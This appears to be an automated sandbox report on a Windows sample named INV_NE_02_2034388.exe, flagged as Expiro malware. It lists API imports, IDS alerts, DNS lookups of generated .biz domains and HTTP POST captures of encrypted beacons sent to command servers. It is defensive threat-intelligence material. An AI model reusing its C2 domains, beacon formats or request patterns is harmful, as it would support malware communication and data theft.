SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T08:57:47.022692+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49701 | 54.244.188.177 | 80 | TCP
2024-12-13T08:57:47.143286+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49701 | TCP
2024-12-13T08:57:47.143286+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.7 | 49701 | TCP
2024-12-13T08:57:53.707129+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 52945 | 1.1.1.1 | 53 | UDP
2024-12-13T08:57:53.777240+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49711 | TCP
2024-12-13T08:57:53.777240+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.7 | 49711 | TCP
2024-12-13T08:58:02.451238+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.7 | 64716 | 1.1.1.1 | 53 | UDP
2024-12-13T08:58:05.616265+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49738 | TCP
2024-12-13T08:58:05.616265+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.7 | 49738 | TCP
2024-12-13T08:58:50.913385+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 49795 | 82.112.184.197 | 80 | TCP
2024-12-13T08:59:39.008398+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49950 | TCP
2024-12-13T08:59:39.008398+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.7 | 49950 | TCP
2024-12-13T08:59:41.942002+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 49960 | TCP
2024-12-13T08:59:41.942002+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 49960 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 08:57:43.406486988 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:43.527578115 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:43.527659893 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:43.585007906 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:43.585007906 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:43.706017017 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:43.706033945 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:44.886413097 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:44.886459112 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:44.886548996 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:44.942709923 CET | 49700 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:45.062495947 CET | 80 | 49700 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:45.548350096 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:45.668101072 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:45.668188095 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:45.668587923 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:45.668606997 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:45.788244009 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:45.788278103 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:46.283036947 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:46.402852058 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:46.402971983 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:46.403182983 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:46.403234005 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:46.522973061 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:46.523000956 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:47.022608042 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:47.022629023 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:47.022691965 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:47.023606062 CET | 49701 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:47.143285990 CET | 80 | 49701 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:47.254192114 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:47.373958111 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:47.374044895 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:47.382857084 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:47.382895947 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:47.505276918 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:47.505335093 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:48.450704098 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:48.451261997 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:48.454502106 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:48.601692915 CET | 49702 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:48.721462965 CET | 80 | 49702 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:49.917896032 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:49.917917967 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:49.918005943 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:49.918189049 CET | 49703 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:57:50.039861917 CET | 80 | 49703 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:57:50.327353954 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:50.447211027 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:50.447340965 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:50.470268011 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:50.470310926 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:50.590100050 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:50.590183020 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:51.801510096 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:51.801857948 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:57:51.801915884 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:51.831271887 CET | 49705 | 80 | 192.168.2.7 | 54.244.188.177
Dec 13, 2024 08:57:51.951178074 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.7
Dec 13, 2024 08:58:03.303308010 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:03.423172951 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:58:03.423280001 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:03.445158958 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:03.445158958 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:03.568073034 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:58:03.568136930 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:58:05.495245934 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:58:05.495414972 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:58:05.495471954 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:05.495598078 CET | 49738 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:58:05.616265059 CET | 80 | 49738 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:45.651549101 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:45.773133039 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:45.773458958 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:45.773694038 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:45.773741007 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:45.897615910 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:45.897694111 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:47.833221912 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:47.833245039 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Dec 13, 2024 08:59:47.833405018 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:47.833405972 CET | 49973 | 80 | 192.168.2.7 | 18.141.10.107
Dec 13, 2024 08:59:47.958336115 CET | 80 | 49973 | 18.141.10.107 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 08:57:41.295751095 CET | 58117 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:42.041624069 CET | 53 | 58117 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:57:45.184712887 CET | 58540 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:45.324726105 CET | 53 | 58540 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:57:45.630405903 CET | 52325 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:46.168780088 CET | 53 | 52325 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:57:47.080204964 CET | 61084 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:47.218055010 CET | 53 | 61084 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:57:48.622184038 CET | 50327 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:49.185622931 CET | 53 | 50327 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:57:49.977952957 CET | 54436 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:57:50.117605925 CET | 53 | 54436 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:58:02.450383902 CET | 53 | 61300 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:58:05.747647047 CET | 53 | 52853 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:58:05.980045080 CET | 53 | 65213 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 08:59:47.834794044 CET | 61548 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 08:59:48.431207895 CET | 53 | 61548 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 08:57:41.295751095 CET | 192.168.2.7 | 1.1.1.1 | 0x4dd5 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:45.184712887 CET | 192.168.2.7 | 1.1.1.1 | 0x95c3 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:45.630405903 CET | 192.168.2.7 | 1.1.1.1 | 0x9394 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:47.080204964 CET | 192.168.2.7 | 1.1.1.1 | 0xd80a | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:48.622184038 CET | 192.168.2.7 | 1.1.1.1 | 0xe6e0 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:49.977952957 CET | 192.168.2.7 | 1.1.1.1 | 0x95f2 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:59:47.834794044 CET | 192.168.2.7 | 1.1.1.1 | 0x841a | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 08:57:42.041624069 CET | 1.1.1.1 | 192.168.2.7 | 0x4dd5 | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:45.324726105 CET | 1.1.1.1 | 192.168.2.7 | 0x95c3 | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:46.168780088 CET | 1.1.1.1 | 192.168.2.7 | 0x9394 | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:47.218055010 CET | 1.1.1.1 | 192.168.2.7 | 0xd80a | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:49.185622931 CET | 1.1.1.1 | 192.168.2.7 | 0xe6e0 | No error (0) | cvgrf.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:57:50.117605925 CET | 1.1.1.1 | 192.168.2.7 | 0x95f2 | No error (0) | cvgrf.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:58:02.450383902 CET | 1.1.1.1 | 192.168.2.7 | 0x92bc | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:58:05.747647047 CET | 1.1.1.1 | 192.168.2.7 | 0xd2ae | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:58:05.980045080 CET | 1.1.1.1 | 192.168.2.7 | 0xe2ad | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:59:48.431207895 CET | 1.1.1.1 | 192.168.2.7 | 0x841a | No error (0) | fwiwk.biz | | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 08:59:48.431207895 CET | 1.1.1.1 | 192.168.2.7 | 0x841a | No error (0) | fwiwk.biz | | 172.234.222.143 | A (IP address) | IN (0x0001) | false
• pywolwnvd.biz
• ssbzmoy.biz
• cvgrf.biz
• knjghuig.biz
• vcddkls.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 54.244.188.177 | 80 | 7368 | C:\Users\user\Desktop\INV_NE_02_2034388.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:57:43.585007906 CET | 358 | OUT | POST /wtafuencqgdxd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 824
Dec 13, 2024 08:57:43.585007906 CET | 824 | OUT | Data Raw: 53 59 33 53 9c b7 b3 48 2c 03 00 00 17 fe db 43 9b 40 bc 56 22 30 b9 71 33 6b b3 d0 39 f4 0e 7b 69 90 b7 ae 26 6a 2f 51 1f d6 ce 56 4b 05 78 87 9f db e4 ba f4 a8 08 73 3a c0 28 5f 6c 1a 6e f4 bb bd ec 5b 70 86 8b 96 26 2c 80 ce 6c 06 89 ca 34 37
Data Ascii: SY3SH,C@V"0q3k9{i&j/QVKxs:(_ln[p&,l47+|%6\z0] uNw3DAQp Bl.ZYl ,\nBR\rGmAz^\8#nzM{=oWCNoPpNz8O];`o&q,pvllP
Dec 13, 2024 08:57:44.886413097 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Dec 2024 07:57:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=712277f526c0023fa93e3c1906b9585b|8.46.123.189|1734076664|1734076664|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 54.244.188.177 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:57:45.668587923 CET | 361 | OUT | POST /trlioiljoillllwq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 874
Dec 13, 2024 08:57:45.668606997 CET | 874 | OUT | Data Raw: 07 8f 48 df c9 2d 09 0a 5e 03 00 00 91 fd 3f 6f bf 18 6d 96 52 d4 08 65 15 ef f1 48 00 36 e3 54 d7 91 1e 66 08 a6 b7 96 0e 2a eb d2 c4 62 cf 7a 1b d9 2a de 5e 0a 7e 42 66 98 3f f5 d5 69 da 80 d7 1c b9 e0 11 7b 0b cd a6 5c 45 7c 55 13 45 77 2c 86
Data Ascii: H-^?omReH6Tf*bz*^~Bf?i{\E|UEw,jwMP8ezW}W!jEGT:@#:{CNHz(yqR{:|Z%\qaMZ:(>CoEc&:?e^kx:gHHuhKA]$t
Dec 13, 2024 08:57:47.022608042 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Dec 2024 07:57:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6e1bba5a5fba7cc674cf1f0d1809520a|8.46.123.189|1734076666|1734076666|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49702 | 18.141.10.107 | 80 | 7368 | C:\Users\user\Desktop\INV_NE_02_2034388.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:57:46.403182983 CET | 359 | OUT | POST /amnlbtdctisruxvs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 824
Dec 13, 2024 08:57:46.403234005 CET | 824 | OUT | Data Raw: e0 5b 4b 86 22 16 d7 ec 2c 03 00 00 c8 fe 01 6d fd b2 e6 66 4a b9 a9 97 d8 8d b1 dd 03 12 ee d7 78 35 d9 1b 85 35 1f a5 7e 0a 83 52 83 27 d3 0d 2f 97 16 76 9b a8 83 42 5f 19 44 75 3b 8d b5 e5 ca 29 d6 62 3f 92 3e 93 72 25 9e 5b 4b 87 06 71 9a 9e
Data Ascii: [K",mfJx55~R'/vB_Du;)b?>r%[Kq=L`;{]*^ 6%nRvcVQ22!'\fI{16.V_OT08Mi}Yz\LC{zcZY]7^pnv"(
Dec 13, 2024 08:57:48.450704098 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Dec 2024 07:57:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9dd6f1f32d0205f1ca5977e345492ac9|8.46.123.189|1734076668|1734076668|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49703 | 18.141.10.107 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 08:57:47.382857084 CET | 351 | OUT | POST /wibawwpi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 874
Dec 13, 2024 08:57:47.382895947 CET | 874 | OUT | Data Raw: 3c c1 f9 ed 68 5f f4 ba 5e 03 00 00 40 e7 61 44 da 3f 9c 81 e9 94 dd 10 5a 68 b1 00 51 46 84 3e 4d 8c 5a 34 bc b7 11 1e 28 fe 8c 44 c8 f1 c6 de 87 3a 2f 76 2e ea 9f 67 fb 29 af 8d b4 c6 72 c9 e3 13 eb 22 a3 d9 56 12 36 35 6a 58 71 69 96 c2 86 06
Data Ascii: <h_^@aD?ZhQF>MZ4(D:/v.g)r"V65jXqijX^aA#.j_MDQMCU*zBE2O>eAD8p4=J lSSldRqT5_4@%W~9UbTM&?
Dec 13, 2024 08:57:49.917896032 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Dec 2024 07:57:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3e7ffa94220fa028bf7f9fcb84ec32ba|8.46.123.189|1734076669|1734076669|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                        Session ID: 4
                                        Source IP: 192.168.2.7
                                        Source Port: 49705
                                        Destination IP: 54.244.188.177
                                        Destination Port: 80
                                        PID / Process: (blank in the report)

                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 13, 2024 08:57:50.470268011 CET | 350 | OUT | POST /mddjrljmh HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: cvgrf.biz
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                        Content-Length: 874
                                        Dec 13, 2024 08:57:50.470310926 CET | 874 | OUT | Data Raw: cb f3 16 8c 7c e4 71 2c 5e 03 00 00 e2 c4 de 9a 87 41 63 03 c7 22 e3 08 e1 8c 03 7d bc c7 c2 2a 0a 14 e9 7b e8 b3 05 41 8a 03 4e 6b b3 8a 44 94 18 5d 8d fc aa 40 6b a3 08 2e 8a 83 17 be 15 2d 76 95 33 ee 41 3e 5c 14 3d 0d 23 92 69 05 5c 10 c3 a4
                                        Data Ascii: |q,^Ac"}*{ANkD]@k.-v3A>\=#i\:*n]HH9=Mu>Teu-AysT5U/IL})>^88,_Hjv2A:N?2X\y}izE"cb<9b=Tl?&K^5l
                                        Dec 13, 2024 08:57:51.801510096 CET | 409 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 Dec 2024 07:57:51 GMT
                                        Content-Type: text/html
